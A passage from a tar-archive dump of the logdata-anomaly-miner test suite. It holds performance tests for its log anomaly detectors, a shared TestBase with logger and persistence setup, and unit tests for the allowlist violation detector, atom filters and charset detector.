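            self.run_match_value_average_change_detector(number_of_paths)

    def test05match_value_stream_writer(self):
        """Start performance tests for MatchValueStreamWriter."""
        for number_of_paths in (1, 30, 100):
            self.run_match_value_stream_writer(number_of_paths)

    def test06missing_match_path_value_detector(self):
        """Start performance tests for MissingMatchPathValueDetector."""
        for number_of_paths in (1, 30, 100):
            self.run_missing_match_path_value_detector(number_of_paths)

    def test07new_match_path_detector(self):
        """Start performance tests for NewMatchPathDetector."""
        for number_of_paths in (1, 1000, 100000):
            self.run_new_match_path_detector(number_of_paths)

    def test08new_match_path_value_combo_detector(self):
        """Start performance tests for NewMatchPathValueComboDetector."""
        for number_of_paths in (1, 30, 100):
            self.run_new_match_path_value_combo_detector(number_of_paths)

    def test09new_match_path_value_detector(self):
        """Start performance tests for NewMatchPathValueDetector."""
        for number_of_paths in (1, 30, 100):
            self.run_new_match_path_value_detector(number_of_paths)

    def test10time_correlation_detector(self):
        """Start performance tests for TimeCorrelationDetector."""
        for arg in (10, 100, 1000):
            self.run_time_correlation_detector(arg)

    def test11time_correlation_violation_detector(self):
        """Start performance tests for TimeCorrelationViolationDetector."""
        for arg in (0.99, 0.95, 0.50, 0.01):
            self.run_time_correlation_violation_detector(arg)

    def test12timestamp_correction_filters(self):
        """Start performance tests for TimestampCorrectionFilters."""
        for arg in (1, 1000, 100000):
            self.run_timestamp_correction_filters(arg)

    def test13timestamps_unsorted_detector(self):
        """Start performance tests for TimestampsUnsortedDetector."""
        for arg in (0.001, 0.1, 1, 100):
            self.run_timestamps_unsorted_detector(arg)

    def test14allowlist_violation_detector(self):
        """Start performance tests for AllowlistViolationDetector."""
        # the first argument is the outer sweep, as in the original call list
        for first_arg in (1, 1000, 100000):
            for second_arg in (99, 50, 1):
                self.run_allowlist_violation_detector(first_arg, second_arg)

    def test15new_match_id_value_combo_detector(self):
        """Start performance tests for NewMatchIdValueComboDetector."""
        for arg in (0.1, 5, 20, 100):
            self.run_new_match_id_value_combo_detector(arg)

    def test16parser_count(self):
        """Start performance tests for ParserCount."""
        # first with a path, then without one
        for use_path in (True, False):
            for arg in (60, 1000, 10000, 100000):
                self.run_parser_count(use_path, arg)

    def test17event_correlation_detector(self):
        """Start performance tests for EventCorrelationDetector."""
        # The nine positional arguments appear to map to generation, diff, p0, alpha, max_hypotheses, max_observations,
        # candidates_size, hypothesis_eval_delta_time and delta_time_to_discard_hypothesis (the order of the result string
        # in run_event_correlation_detector) - confirm against its signature, which is outside this part of the file.
        # The baseline configuration is repeated in front of every parameter sweep, exactly as in the original call list.
        baseline = (1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        parameter_sets = [
            baseline,
            (0.5, 5, 0.9, 0.05, 1000, 500, 5, 120, 180),
            (0.1, 5, 0.9, 0.05, 1000, 500, 5, 120, 180),
            (1.0, 10, 0.9, 0.05, 1000, 500, 5, 120, 180),
            baseline,
            (1.0, 1, 0.9, 0.05, 1000, 500, 5, 120, 180),
            (1.0, 0.1, 0.9, 0.05, 1000, 500, 5, 120, 180),
            (1.0, 5, 1.0, 0.01, 1000, 500, 5, 120, 180),
            baseline,
            (1.0, 5, 0.7, 0.1, 1000, 500, 5, 120, 180),
            baseline,
            (1.0, 5, 0.9, 0.05, 2000, 500, 5, 120, 180),
            (1.0, 5, 0.9, 0.05, 10000, 500, 5, 120, 180),
            baseline,
            (1.0, 5, 0.9, 0.05, 1000, 1000, 5, 120, 180),
            (1.0, 5, 0.9, 0.05, 1000, 2000, 5, 120, 180),
            baseline,
            (1.0, 5, 0.9, 0.05, 1000, 500, 10, 120, 180),
            (1.0, 5, 0.9, 0.05, 1000, 500, 100, 120, 180),
            baseline,
            (1.0, 5, 0.9, 0.05, 1000, 500, 5, 60, 90),
            (1.0, 5, 0.9, 0.05, 1000, 500, 5, 30, 45),
        ]
        for parameters in parameter_sets:
            self.run_event_correlation_detector(*parameters)

    def test18match_filter(self):
        """Start performance tests for MatchFilter."""
        for number_of_paths in (1, 1000, 100000):
            self.run_match_filter(number_of_paths)

    def test19event_type_detector(self):
        """Start performance tests for EventTypeDetector."""
        for number_of_paths in (None, 1, 10, 100):
            self.run_event_type_detector(number_of_paths)

    def test20variable_type_detector(self):
        """Start performance tests for VariableTypeDetector."""
        for number_of_paths in (None, 1, 10, 100):
            self.run_variable_type_detector(number_of_paths)

    def test21variable_correlation_detector(self):
        """Start performance tests for VariableCorrelationDetector."""
        # The VCD should never be run without path restrictions (in the ETD or via ignore_list, constraint_list) as the performance is
        # terrible.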
# self.run_variable_correlation_detector(None) self.run_variable_correlation_detector(1) self.run_variable_correlation_detector(10) self.run_variable_correlation_detector(100) def test22event_frequency_detector(self): """Start performance tests for EventFrequencyDetector.""" self.run_event_frequency_detector(None) self.run_event_frequency_detector(1) self.run_event_frequency_detector(10) self.run_event_frequency_detector(100) def test23event_frequency_detector(self): """Start performance tests for EventSequenceDetector.""" self.run_event_sequence_detector(1) self.run_event_sequence_detector(10) self.run_event_sequence_detector(100) if __name__ == '__main__': unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/TestBase.py000066400000000000000000000271671437606560100240650ustar00rootroot00000000000000import unittest import os import shutil import logging import sys import errno import inspect from aminer.AminerConfig import KEY_LOG_DIR, DEFAULT_LOG_DIR, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, DEBUG_LOG_NAME,\ KEY_REMOTE_CONTROL_LOG_FILE, KEY_STAT_LOG_FILE, KEY_DEBUG_LOG_FILE, REMOTE_CONTROL_LOG_NAME, DEFAULT_REMOTE_CONTROL_LOG_FILE,\ STAT_LOG_NAME, DEFAULT_STAT_LOG_FILE, DEBUG_LEVEL, load_config, build_persistence_file_name, DEFAULT_DEBUG_LOG_FILE from aminer.AnalysisChild import AnalysisContext from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement from aminer.util import PersistenceUtil from aminer.util import SecureOSFunctions from _io import StringIO def initialize_loggers(aminer_config, aminer_user_id, aminer_grp_id): """Initialize all loggers.""" datefmt = '%d/%b/%Y:%H:%M:%S %z' log_dir = aminer_config.config_properties.get(KEY_LOG_DIR, DEFAULT_LOG_DIR) if log_dir == DEFAULT_LOG_DIR: try: if not os.path.isdir(log_dir): persistence_dir_path = aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, 
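DEFAULT_PERSISTENCE_DIR)
                persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir_path)
                # the log directory is only created inside the default persistence directory; a custom base directory is left alone
                if SecureOSFunctions.base_dir_path == DEFAULT_PERSISTENCE_DIR:
                    relative_path_log_dir = os.path.split(DEFAULT_LOG_DIR)[1]
                    os.mkdir(relative_path_log_dir, dir_fd=persistence_dir_fd)
                    # follow_symlinks=False: a symlink planted at that name must not redirect the ownership change
                    os.chown(relative_path_log_dir, aminer_user_id, aminer_grp_id, dir_fd=persistence_dir_fd, follow_symlinks=False)
        except OSError as e:
            if e.errno != errno.EEXIST:
                msg = 'Unable to create log-directory: %s' % log_dir
            else:
                # str(e): the exception object has no strip(), so the EEXIST branch used to fail with AttributeError below
                msg = str(e)
            logging.getLogger(DEBUG_LOG_NAME).error(msg.strip('\n'))
            print(msg, file=sys.stderr)
    # every log file name is validated before the log directory is opened, in the original order
    for key in (KEY_REMOTE_CONTROL_LOG_FILE, KEY_STAT_LOG_FILE, KEY_DEBUG_LOG_FILE):
        _exit_if_log_file_name_has_directory(aminer_config, key)
    log_dir_fd = SecureOSFunctions.secure_open_log_directory(log_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH)

    rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME)
    rc_logger.setLevel(logging.DEBUG)
    remote_control_log_file = _resolve_log_file(aminer_config, KEY_REMOTE_CONTROL_LOG_FILE, log_dir, DEFAULT_REMOTE_CONTROL_LOG_FILE)
    rc_logger.addHandler(_open_owned_file_handler(
        remote_control_log_file, log_dir_fd, aminer_user_id, aminer_grp_id, '%(asctime)s %(levelname)s %(message)s', datefmt))
    logging.addLevelName(15, "REMOTECONTROL")

    stat_logger = logging.getLogger(STAT_LOG_NAME)
    stat_logger.setLevel(logging.INFO)
    stat_log_file = _resolve_log_file(aminer_config, KEY_STAT_LOG_FILE, log_dir, DEFAULT_STAT_LOG_FILE)
    stat_logger.addHandler(_open_owned_file_handler(
        stat_log_file, log_dir_fd, aminer_user_id, aminer_grp_id, '%(asctime)s %(message)s', datefmt))

    debug_logger = logging.getLogger(DEBUG_LOG_NAME)
    if DEBUG_LEVEL == 0:
        debug_logger.setLevel(logging.ERROR)
    elif DEBUG_LEVEL == 1:
        debug_logger.setLevel(logging.INFO)
    else:
        debug_logger.setLevel(logging.DEBUG)
    debug_log_file = _resolve_log_file(aminer_config, KEY_DEBUG_LOG_FILE, log_dir, DEFAULT_DEBUG_LOG_FILE)
    debug_logger.addHandler(_open_owned_file_handler(
        debug_log_file, log_dir_fd, aminer_user_id, aminer_grp_id, '%(asctime)s %(levelname)s %(message)s', datefmt))


def _exit_if_log_file_name_has_directory(aminer_config, key):
    """
    Exit the process when the log file name configured under key contains a directory separator.

    Log files must stay inside the securely opened log directory, so only a bare file name is accepted. The configured value
    may be str or bytes; the former check used b'/' only, which raises TypeError instead of rejecting a str value.
    @param aminer_config the loaded configuration whose config_properties are inspected.
    @param key the configuration property name to validate.
    """
    value = aminer_config.config_properties.get(key)
    if value is None:
        return
    separator = b'/' if isinstance(value, bytes) else '/'
    if separator in value:
        print('%s attribute must not contain a full directory path, but only the filename.' % key, file=sys.stderr)
        sys.exit(1)


def _resolve_log_file(aminer_config, key, log_dir, default_name):
    """
    Return the log file path configured under key, defaulting to default_name, placed inside log_dir.

    NOTE(review): startswith() is a plain prefix test, not a containment check; it is only safe because
    _exit_if_log_file_name_has_directory() has already rejected every configured name holding a '/'.
    """
    log_file = aminer_config.config_properties.get(key, os.path.join(log_dir, default_name))
    if not log_file.startswith(log_dir):
        log_file = os.path.join(log_dir, log_file)
    return log_file


def _open_owned_file_handler(log_file, log_dir_fd, aminer_user_id, aminer_grp_id, fmt, datefmt):
    """
    Create a logging.FileHandler on log_file owned by the aminer user and group, exiting the process on any OSError.

    @param log_dir_fd descriptor of the log directory; os.chown only uses it when log_file is a relative path.
    @return the FileHandler with its formatter set; the caller attaches it to a logger.
    NOTE(review): FileHandler opens the file following symlinks; only the chown is symlink-safe (follow_symlinks=False).
    """
    try:
        file_handler = logging.FileHandler(log_file)
        os.chown(log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False)
    except OSError as e:
        print('Could not create or open %s: %s. Stopping..' % (log_file, e), file=sys.stderr)
        sys.exit(1)
    file_handler.setFormatter(logging.Formatter(fmt=fmt, datefmt=datefmt))
    return file_handler


# skipcq: PTC-W0046
class TestBase(unittest.TestCase):
    """This is the base class for all unittests."""

    def get_config_file_path(self):
        """
        Get the module name to choose the right config file for parallel execution.
        Example: logdata-anomaly-miner/aecid-testsuite/unit/analysis/AtomFiltersTest.py - we want to know the directory analysis.
        @return <cwd>/unit/data/parallel_configs/<directory>_config.py, where <directory> is the first path component of the
                test module after 'unit/'.
        """
        module_dir = inspect.getmodule(self).__file__.split("unit/")[1].split("/")[0]
        return os.getcwd() + '/unit/data/parallel_configs/%s_config.py' % module_dir

    def setUp(self):
        """Set up all needed variables and remove persisted data."""
        PersistenceUtil.persistable_components = []
        self.aminer_config = load_config(self.get_config_file_path())
        self.analysis_context = AnalysisContext(self.aminer_config)
        self.output_stream = StringIO()
        self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream)
        # the persistence directory of the test configuration is wiped and recreated so no state leaks between tests
        persistence_dir_name = build_persistence_file_name(self.aminer_config)
        if os.path.exists(persistence_dir_name):
            shutil.rmtree(persistence_dir_name)
        if not os.path.exists(persistence_dir_name):
            os.makedirs(persistence_dir_name)
        initialize_loggers(self.aminer_config, os.getuid(), os.getgid())
        # SecureOSFunctions works on a bytes path
        if isinstance(persistence_dir_name, str):
            persistence_dir_name = persistence_dir_name.encode()
        SecureOSFunctions.secure_open_base_directory(persistence_dir_name, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH)
        PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = True

    def tearDown(self):
        """Delete all persisted data after the tests."""
        self.aminer_config = load_config(self.get_config_file_path())
        persistence_file_name = build_persistence_file_name(self.aminer_config)
        if os.path.exists(persistence_file_name):
            shutil.rmtree(persistence_file_name)
        if not os.path.exists(persistence_file_name):
            os.makedirs(persistence_file_name)
        SecureOSFunctions.close_base_directory()

    def reset_output_stream(self):
        """Reset the output stream."""
        self.output_stream.seek(0)
        self.output_stream.truncate(0)

    def compare_match_results(self, data, match_element, match_context, id_, path, match_string, match_object, children):
        """
        Compare the results of get_match_element() if match_element is not None.

        @param data the input the match context was created from; the context must have consumed exactly match_string of it.
        @param children expected child elements (path, match_string, match_object compared, their own children must be None)
               or None when no children are expected.
        """
        self.assertEqual(match_element.path, "%s/%s" % (path, id_))
        self.assertEqual(match_element.match_string, match_string)
        self.assertEqual(match_element.match_object, match_object)
        if children is None:
            self.assertIsNone(match_element.children)
        else:
            self.assertEqual(len(children), len(match_element.children))
            for i, child in enumerate(children):
                self.assertEqual(match_element.children[i].path, child.path)
                self.assertEqual(match_element.children[i].match_string, child.match_string)
                self.assertEqual(match_element.children[i].match_object, child.match_object)
                self.assertIsNone(match_element.children[i].children)
        self.assertEqual(match_context.match_string, match_string)
        self.assertEqual(match_context.match_data, data[len(match_string):])

    def compare_no_match_results(self, data, match_element, match_context):
        """Compare the results of get_match_element() if match_element is None: nothing may have been consumed from data."""
        self.assertIsNone(match_element)
        self.assertEqual(match_context.match_data, data)


class DummyMatchContext:
    """Dummy class for MatchContext."""

    def __init__(self, match_data: bytes):
        """Initiate the Dummy class with the data still to be matched and an empty matched prefix."""
        self.match_data = match_data
        self.match_string = b''

    def update(self, match_string: bytes):
        """Consume match_string from the front of match_data and append it to the matched prefix."""
        self.match_data = self.match_data[len(match_string):]
        self.match_string += match_string


class DummyFixedDataModelElement(ModelElementInterface):
    """Dummy class for fixed string ModelElements."""

    def __init__(self, element_id: str, data: bytes):
        """Create the element; data is the exact byte string it matches."""
        self.element_id = element_id
        self.data = data

    def get_id(self):
        """Get the element ID."""
        return self.element_id

    def get_child_elements(self):  # skipcq: PYL-R0201
        """
        Get all possible child model elements of this element.
        @return None as there are no children of this element.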
""" return None def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" if not match_context.match_data.startswith(self.data): return None match_context.update(self.data) return MatchElement("%s/%s" % (path, self.element_id), self.data, self.data, None) class DummyFirstMatchModelElement(ModelElementInterface): """This class defines a model element to return the match from the the first matching child model within a given list.""" def __init__(self, element_id, children): self.element_id = element_id self.children = children if (children is None) or (None in children): msg = 'Invalid children list' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def get_id(self): """Get the element ID.""" return self.element_id def get_child_elements(self): """Get all possible child model elements of this element.""" return self.children def get_match_element(self, path, match_context): """@return None when there is no match, MatchElement otherwise.""" current_path = "%s/%s" % (path, self.element_id) match_data = match_context.match_data for child_element in self.children: child_match = child_element.get_match_element(current_path, match_context) if child_match is not None: return child_match match_context.match_data = match_data return None if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/__init__.py000066400000000000000000000000001437606560100240630ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/000077500000000000000000000000001437606560100236075ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/AllowlistViolationDetectorTest.py000066400000000000000000000055231437606560100323570ustar00rootroot00000000000000import unittest from aminer.analysis.Rules import PathExistsMatchRule from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.MatchContext 
import MatchContext from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector from unit.TestBase import TestBase from datetime import datetime import time class AllowlistViolationDetectorTest(TestBase): """Unittests for the AllowlistViolationDetector.""" __expected_string = '%s No allowlisting for current atom\n%s: "%s" (%d lines)\n %s\n\n' fixed_string = b'fixed String' def test1match_found(self): """This test case checks if valid inputs are recognized.""" description = "Test1AllowlistViolationDetector" path_exists_match_rule = PathExistsMatchRule('match/s1', None) path_exists_match_rule2 = PathExistsMatchRule('match/s2', None) t = time.time() allowlist_violation_detector = AllowlistViolationDetector(self.aminer_config, [path_exists_match_rule, path_exists_match_rule2], [ self.stream_printer_event_handler], output_logline=False) self.analysis_context.register_component(allowlist_violation_detector, description) fixed_dme = FixedDataModelElement('s1', self.fixed_string) match_context = MatchContext(self.fixed_string) match_element = fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, allowlist_violation_detector) self.assertTrue(allowlist_violation_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') fixed_dme = FixedDataModelElement('s2', self.fixed_string) match_context = MatchContext(self.fixed_string) match_element = fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, allowlist_violation_detector) self.assertTrue(allowlist_violation_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') fixed_dme = FixedDataModelElement('s3', self.fixed_string) match_context = MatchContext(self.fixed_string) match_element = 
fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, path_exists_match_rule) self.assertTrue(not allowlist_violation_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), allowlist_violation_detector.__class__.__name__, description, 1, "fixed String")) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/AtomFiltersTest.py000066400000000000000000000211601437606560100272520ustar00rootroot00000000000000import unittest from aminer.analysis.AtomFilters import SubhandlerFilter, MatchPathFilter, MatchValueFilter from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from unit.TestBase import TestBase class AtomFiltersTest(TestBase): """Unittests for the AtomFilters.""" match_context_fixed_dme = MatchContext(b'25000') fixed_dme = FixedDataModelElement('s1', b'25000') match_element_fixed_dme = fixed_dme.get_match_element("fixed", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(b'25000') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element("integer", match_context_decimal_integer_value_me) def test1_no_list_or_no_atom_handler_list(self): """This test case verifies, that exceptions are raised when using wrong parameters.""" self.assertRaises(Exception, SubhandlerFilter, 
NewMatchPathDetector(self.aminer_config, [], 'Default', True), False) self.assertRaises(Exception, SubhandlerFilter, FixedDataModelElement('fixed', b'gesuchter String'), False) def test2receive_atom_unhandled(self): """In this test case no handler can handle the log atom.""" description = "Test2AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) subhandler_filter = SubhandlerFilter([], True) self.assertTrue(not subhandler_filter.receive_atom(log_atom_fixed_dme)) def test3receive_atom_handled_by_more_handlers(self): """In this test case more than one handler can handle the log atom. The impact of the stop_when_handled flag is tested.""" description = "Test3AtomFilters" other_description = "Test3OtherAtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() other_new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(other_new_match_path_detector, other_description) log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) subhandler_filter = SubhandlerFilter([new_match_path_detector, other_new_match_path_detector], False) self.assertTrue(subhandler_filter.receive_atom(log_atom_fixed_dme)) result = self.output_stream.getvalue() self.reset_output_stream() new_match_path_detector.receive_atom(log_atom_fixed_dme) result_fixed_dme = self.output_stream.getvalue() self.reset_output_stream() 
other_new_match_path_detector.receive_atom(log_atom_fixed_dme) result_decimal_integer_value_me = self.output_stream.getvalue() self.assertEqual(result, result_fixed_dme + result_decimal_integer_value_me) def test4match_path_filter_receive_atom_path_in_dictionary(self): """There is a path in the dictionary and the handler is not None. The default_parsed_atom_handler is None.""" description = "Test4AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_path_filter = MatchPathFilter([(self.match_element_fixed_dme.get_path(), new_match_path_detector)], None) self.assertTrue(match_path_filter.receive_atom(log_atom_fixed_dme)) def test5match_path_filter_receive_atom_path_not_in_dictionary(self): """The searched path is not in the dictionary. The default_parsed_atom_handler is None.""" description = "Test5AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_path_filter = MatchPathFilter([(self.match_element_decimal_integer_value_me.get_path(), new_match_path_detector)], None) self.assertTrue(not match_path_filter.receive_atom(log_atom_fixed_dme)) def test6match_path_filter_receive_atom_path_not_in_dictionary_default_set(self): """The searched path is not in the dictionary. 
The default_parsed_atom_handler is set.""" description = "Test6AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_path_filter = MatchPathFilter([(self.match_element_decimal_integer_value_me.get_path(), new_match_path_detector)], new_match_path_detector) self.assertTrue(match_path_filter.receive_atom(log_atom_fixed_dme)) def test7match_value_filter_receive_atom_target_value_and_handler_found(self): """A target_value and a handler, which can handle the matchObject is found.""" description = "Test7AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_value_filter = MatchValueFilter(self.match_element_fixed_dme.get_path(), {self.fixed_dme.fixed_data: new_match_path_detector}, None) self.assertTrue(match_value_filter.receive_atom(log_atom_fixed_dme)) def test8match_value_filter_receive_atom_target_value_found_handler_not_found(self): """A target_value was found, but no handler can handle it. 
DefaultParsedAtomHandler = None.""" description = "Test8AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_value_filter = MatchValueFilter(self.match_element_fixed_dme.get_path(), {self.fixed_dme.fixed_data: None}, None) self.assertTrue(not match_value_filter.receive_atom(log_atom_fixed_dme)) def test9match_value_filter_receive_atom_target_value_not_found(self): """No target_value was found in the dictionary.""" description = "Test9AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(b'24999', ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_value_filter = MatchValueFilter(self.match_element_fixed_dme.get_path(), {self.fixed_dme.fixed_data: None}, None) self.assertTrue(not match_value_filter.receive_atom(log_atom_fixed_dme)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/CharsetDetectorTest.py000066400000000000000000000137521437606560100301140ustar00rootroot00000000000000import unittest from aminer.analysis.CharsetDetector import CharsetDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomaly = None # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomaly = evdat class 
CharsetDetectorTest(TestBase): """Unittests for the ValueRangeDetectorDetector.""" def test1_normal_sequence_detection(self): """ This test case checks the normal detection of new character sets. The charset detector is used to learn an alphabet and detect new characters for different identifiers. """ description = "Test1CharsetDetector" # Initialize detector test_handler = TestHandler() event_charset_detector = CharsetDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 'Default', True, False) self.analysis_context.register_component(event_charset_detector, description) # Prepare log atoms that represent two entities (id) with strings (value). Anomalies are generated when new characters are observed. # The following events are generated: # id: a value: abc # id: b value: xyz # id: a value: asdf # id: a value: xxx # id: a value: bass # id: a value: max m_1 = MatchElement('/model/id', b'a', b'a', None) m_2 = MatchElement('/model/value', b'abc', b'abc', None) match_element_1 = MatchElement('/model', b'aabc', b'aabc', [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b'aabc', parser_match_1, 1, None) m_3 = MatchElement('/model/id', b'b', b'b', None) m_4 = MatchElement('/model/value', b'xyz', b'xyz', None) match_element_2 = MatchElement('/model', b'bxyz', b'bxyz', [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b'bxyz', parser_match_2, 2, None) m_5 = MatchElement('/model/id', b'a', b'a', None) m_6 = MatchElement('/model/value', b'asdf', b'asdf', None) match_element_3 = MatchElement('/model', b'aasdf', b'aasdf', [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b'aasdf', parser_match_3, 3, None) m_7 = MatchElement('/model/id', b'a', b'a', None) m_8 = MatchElement('/model/value', b'xxx', b'xxx', None) match_element_4 = MatchElement('/model', b'bxxx', b'bxxx', [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b'bxxx', 
parser_match_4, 4, None) m_9 = MatchElement('/model/id', b'a', b'a', None) m_10 = MatchElement('/model/value', b'bass', b'bass', None) match_element_5 = MatchElement('/model', b'abass', b'abass', [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b'abass', parser_match_5, 5, None) m_11 = MatchElement('/model/id', b'a', b'a', None) m_12 = MatchElement('/model/value', b'max', b'max', None) match_element_6 = MatchElement('/model', b'bmax', b'bmax', [m_11, m_12]) parser_match_6 = ParserMatch(match_element_6) log_atom_6 = LogAtom(b'bmax', parser_match_6, 6, None) # Forward log atoms to detector # First value of id (a) should not generate an anomaly # Input: id: a value: abc # Expected output: None event_charset_detector.receive_atom(log_atom_1) self.assertIsNone(test_handler.anomaly) # First value of id (b) should not generate an anomaly # Input: id: b value: xyz # Expected output: None event_charset_detector.receive_atom(log_atom_2) self.assertIsNone(test_handler.anomaly) # Second value of id (a) should generate an anomaly for new characters ('sdf' of 'asdf' not in 'abc') # Input: id: a value: asdf # Expected output: Anomaly event_charset_detector.receive_atom(log_atom_3) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': ['asdf'], 'MissingCharacters': ['s', 'd', 'f']}}) test_handler.anomaly = None # Third value of id (a) should generate an anomaly for new characters ('x' not in 'abcsdf', only in 'xyz' from other id (b)) # Input: id: a value: xxx # Expected output: Anomaly event_charset_detector.receive_atom(log_atom_4) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': ['xxx'], 'MissingCharacters': ['x']}}) test_handler.anomaly = None # Fourth value of id (a) should not generate an anomaly (all characters of 'bass' in 'abcsdfx') # Input: id: a value: bass # Expected output: None 
event_charset_detector.receive_atom(log_atom_5) self.assertIsNone(test_handler.anomaly) # Fifth value of id (a) should generate an anomaly for new characters ('m' of 'max' not in 'abcsdfx') event_charset_detector.receive_atom(log_atom_6) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': ['max'], 'MissingCharacters': ['m']}}) test_handler.anomaly = None if __name__ == "__main__": unittest.main() EnhancedNewMatchPathValueComboDetectorTest.py000066400000000000000000000334331437606560100343700ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysisimport unittest from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.input.LogAtom import LogAtom from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector from unit.TestBase import 